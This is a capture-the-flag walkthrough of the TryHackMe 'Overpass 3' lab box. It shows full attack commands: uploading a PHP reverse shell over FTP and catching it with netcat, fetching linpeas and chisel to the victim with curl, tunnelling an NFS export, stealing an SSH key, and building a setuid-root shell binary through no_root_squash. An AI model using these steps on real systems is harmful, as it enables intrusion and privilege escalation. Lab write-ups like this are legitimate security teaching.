Write-up Overpass 3

Hello folks! This is my first writeup on the subject Cybersecurity.

Lets get started.!
Overpass3 | THM

https://tryhackme.com

Deploy the machine and wait for about 5 minutes for all services to start.

Lets start with a check of running services to get an idea of what to work with

NMAP

$ sudo nmap -sC -sV -oN initial <Target-IP-adress>

Results of our nmap scan from the ip of victim box

NMAP reports 3 services.

1. FTP on port 21
2. SSH on port 22
3. HTTP on port 80.

Webservice
Lets start looking at the web-service

Indeed we have a index page, a quick look looking around did not give much info.
We have potential users that we can take a note of:
Paradox
Elf
MuirlandOracle
Ninjac01
James

Lets start a gobuster against this webpage to see if we can access some more data.

Gobuster

$ gobuster dir -u <target IP-adress> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

Mean while gobuster runs lets look at the FTP service if we can access it anonymously.

FTP
In general, you enter the word anonymous or ftp when the host prompts you for a username; you can enter anything for the password, such as your e-mail address or simply the word “guest”.

Credentials to use:
Name: anonymous
Password:

$ ftp <Target IP-adress>

Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:user): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp>

Failed as anonymous login, lets move on!

Gobuster

Reports a directory called /backups.
Lets hit this page and see what we can find.

http://Target-IP-adress/backups/

A compressed archive.

Lets download it and see whats inside!

$ wget http://Target-IP-adress/backups/backup.zip

ZIP-archive
And unzip it with:

$ unzip backup.zip

extracting

Looks like we have a encrypted CustomerDetals.xlsx GPG-file.
GnuPrivacy Guard (GPG) allows you to securely encrypt files so that only the intended recipient can decrypt them.

And a private key!!?
Lets see if it works for decrypting the gpg-file!!

Decryption
Run following commands in terminal.

$ gpg --import priv.key

Nice importing worked nicely.
Lets try decrypting our file!

$ gpg -d CustomerDetails.xlsx.gpg > CustomerDetails.xlsx

We have decrypted data from CustomerDetails.xlsx.gpg in to a new file named CustomerDetails.xlsx
Lets have a look whats inside our decrypted file named CustomerDetails.xlsx
i used Libre Office Calc to view the file.

Username/Password in the CustomerDetails.xlsx file, opened with Libre Office Calc (excel)

This looks great!! Some usernames and passwords!

SSH

SSH needs keys and do not accept passwords on this box. So this is a dead end for now.

FTP

We still have a FTP service that we can try the credentials with, lets do it!

$ ftp <Target IP-adress>

Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:user): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

ls command after logging in.

Nicely!!

We have some files and directories, the backups directory seems to contain the same zip-file we downloaded before. We can also see the index.html file.
Lets put a file in here and test if we can access it from our browser on the website!

PHP reverse-shell
We will download a php reverse shell to your box, edit it, and upload it to the victim box through FTP.

Download php-reverse-shell.php to your box

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

You can use the wget command to download it.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

to have a easier filename to work with — lets change the filename.

$ mv php-reverse-shell.php rev.php

EDIT
rev.php — lines of ip and port to Your THM-IP (the ip of your attacker box, 10.x.x.x.)cPORT to one you would like to use (above 1024):

$ nano rev.php

IP = your thm-ip, port = 9001

Im using port 9001.

Lets upload it to the ftp- server, with paradox-user, with the put-command

FTP

$ put rev.php
#or
$ put /path/to/your/file/rev.php rev.php

put rev.php command if you have rev.php in the same directory where you started your ftp-session on. Otherwise use /path/to/your/rev.php rev.php

When transfer is complete exit out of the ftp-server

$ exit

Reverse shell

Start a netcat listener on the port we picked in the rev.php file (im using port 9001)

Netcat:

$ nc -lvnp 9001

And visit the page from your browser and check netcat (nc) for connection.

http://Target-IP-adress/rev.php

Netcat (nc)

listening on [any] 9001 …
connect to [10.x.x.x] from (UNKNOWN) [10.x.x.x] 36198
Linux localhost.localdomain 4.18.0–193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:12:19 up 2:46, 0 users, load average: 0.00, 0.00, 0.00

Check the userid

$ id

type the command id

Greaaaat!! we have a shell as the user apache!!

Escalate to another user

$ su paradox

Password: ****************

We use the credentials we got from the CustomerDetails.xlsx file.

Check id with the id command:

$ id

uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)

type id in terminal

Ok, great we reused the ftp-password for the user paradox which worked, the other usernames and passwords on the xlsx-file, which i have tried but are not shown in this write up did not work.

Lets run linpeas to see if we can find something to privilege escalate with!

Linpeas

LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix* hosts. The checks are explained on book.hacktricks.xyz

On your attacker-machine (your box), download Linpeas.

$ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

Python

Python supports a webserver out of the box. You can start a web server with a one liner.

Start a http-server on your machine in the same directory as you saved your linpeas.sh file.

$ python3 -m http.server

on the victim machine (target machine) as paradox user
change directory to /dev/shm

$ cd /dev/shm

Curl
Download linpeas from your box to victim box (target box), specify http://Your-ip-adress:port/filename and output file with the curl command:

$ curl http://Your-IP-adress:PORT/linpeas.sh -o linpeas.sh

from victim machine curl the linpeas file from your attacking box. my http.server is on port 8000.

It hits your python http.server and downloads the linpeas file

Chmod
lets make this file executable

$ chmod +x linpeas.sh

make linpeas.sh executable with chmod +x command

And run it

$ ./linpeas.sh

linpeas starts its magic

Possible privilege escalation

manual checking.

no_root_squash:
More info about the subject : https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe

It took me a couple of hours to find a solution for this!
Lets start with upgrading our shell!

Upgrade your shell
in command line on victimbox (target machine) :

$ python3 -c "__import__('pty').spawn('/bin/bash')"

we could have done this when we first got paradox or apache shell but hey, better late then sorry.

Tunneling
Chisel is a fast TCP/UDP tunnel, transported over HTTP.
https://github.com/jpillora/chisel
Download and install the binary on your attacker box

Install it in your own attacker box

Great resource for more information about chisel and alternative installing method.
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

Download chisel to victimbox (target machine)

Make a copy of the chisel-file to your current working directory and download it to victim box (target box) as we did with linpeas.

On victim box make sure that /dev/shm is your current working directory.
Re-start your python3 http.server if you have closed it.

Your box (attacker machine)

$ cp /usr/local/bin/chisel .

From victim box (target machine)

$ curl http://Your-IP-adress:PORT/chisel -o chisel

Make the chisel binary executable on victim box (target machine).

$ chmod +x chisel

Chisel

On Your machine ( Attacker box)

$ chisel server --reverse --port 9002

chisel server with reverse and port switches on our attacking box

Victim box (target machine)

$ ./chisel client 10.x.x.x:9002 R:2049:127.0.0.1:2049 &

2021/01/13 11:41:50 client: Connecting to ws://10.x.x.x:9002
2021/01/13 11:41:50 client: Connected (Latency 47.076869ms)

Information about how reverse chisel works.

#Only as learning information
$ chisel server --reverse --port 9002
#on server side port 9002 is randomly chosen by us to listen on.
$ ./chisel client 10.x.x.x:9002 R:2049:127.0.0.1:2049
# R:2049 means that when connection is established on port 9002 with #your server on the ip 10.x.x.x, the server (your box), also opens the #port 2049. 
#Then when a packet goes through port 2049 on your side, it #redirects it to the tunnel on port 9002 and sends it out to #127.0.0.1:2049 on the victim/target side.
#Hope you get the workflow, lets move on

Great we are connected with chisel!!

NFS mounting

As we saw earlier in this write-up the /etc/exports shows us the configuration for the NFS server. The fsid=0 which will make the /home/james as the root share. Equals to /

The share will be exported as root share. The fsid is set to 0 = /

Your Attacker box
Make a new folder which we then will be mounting to victim box (target machines) /

$ mkdir mount

$ sudo mount -t nfs localhost:/ mount/

Check if it worked and list the contents

If you get something like “bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.” Then you are missing a nfs package, install it with $ sudo apt install nfs-common

$ cd mount
$ ls -al

we have the user.flag!!

user.flag location which we can access!! (we are inside /home/james)
we can also see the .ssh folder!

Lets check whats inside

$ cd .ssh/
$ ls

ls lists these files!

grab the id_rsa file and drop it to your box, you can use cp command or just cat the file and copy over the data to your box.! save the file as id_rsa on your box.

SSH
We will SSH in as james with the id_rsa to see if we can get in.

$ chmod 600 id_rsa
$ ssh -i id_rsa james@<Target-IP-adress>

Great we are in, we will get back to this ssh session as james to run a binary later on. Also keep our chisel services and mounting point running!! lets work with the next step!!

GETTING ROOT with a binary

On your machine (attacker box!)

in your NFS mount /mount
Same place as we have the user.flag and .ssh folder in your box, In terminal type:

$ echo ‘int main() { setgid(0); setuid(0); system(“/bin/bash”); return 0; }’ > exploit.c

in terminal type above command to create exploit.c, be sure that you are in the right directory which is the mount where you can access the shared files of the victim box.

Then

$ sudo gcc exploit.c -o exploit

This will compile a binary with the function to simply set GID and UID as root using setgid() and setuid() and execute the bash shell.

Warnings, dont bother with them. Everything is OK!! Keep moving on.

then

$ sudo chmod +s exploit

lets see the results!!!

Lets try if we can get a root shell!!
Lets run the binary as james user which we SSH:ed in to earlier:

ssh to the <Target IP> with the id_rsa file as james user if you don´t have this session open since before.

Red marked one is our binary to execute./exploit

Execute the binary

$ ./exploit
$ id

#Well Done!! we have our root shell, lets grab the root flag!!

$ cd /root
$ ls

Location of the /root/root.flag

Nicely, we have our root.flag

Waaait a minute!! we are missing one flag?? the web.flag!!
I looked for the webflag for many hours which i then gave up on. This was before i had the james or root shell. Lets try again!!

Web flag
Hunting the web flag and finishing the box!!
As we know is that our two flags ends with .flag extension. could it be in the filesystem somewhere we missed looking in????

Find the web flag!

$ find / -type f -name *.flag 2>/dev/null

Ohhh yeesss!!! /usr/share/httpd/web.flag is the location of the web flag.

$ cd /usr/share/httpd/
$ ls -al

or with find / -type f -name web.flag 2>/dev/null

Now we have all of the flags which we can submit to the room.
Well done!

I hope you enjoyed the box and my first written write-up!
Thanks to the THM team and the room-owner for this beginner friendly challenging box!

Be safe! happy hacking!
//Ekkie!!